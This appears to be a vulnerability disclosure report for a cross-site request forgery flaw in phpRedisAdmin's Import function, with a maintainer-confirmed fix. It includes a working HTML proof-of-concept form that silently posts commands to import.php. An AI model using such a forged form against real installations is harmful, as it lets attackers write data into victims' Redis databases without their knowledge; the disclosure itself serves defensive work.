Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin

Valid

Reported on

Aug 23rd 2021


✍️ Description

The Import functionality in the application is vulnerable to CSRF attacks.

🕵️‍♂️ Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/import.php?s=1&d=0" method="POST">
      <input type="hidden" name="commands" value="DATA TO BE IMPORTED HERE" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


💥 Impact

This vulnerability can let an attacker import data to the database without the knowledge/interaction of the user.

Occurrences

We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back a year ago
Erik Dubbelboer confirmed that a fix has been merged on b9039a a year ago
The fix bounty has been dropped
to join this conversation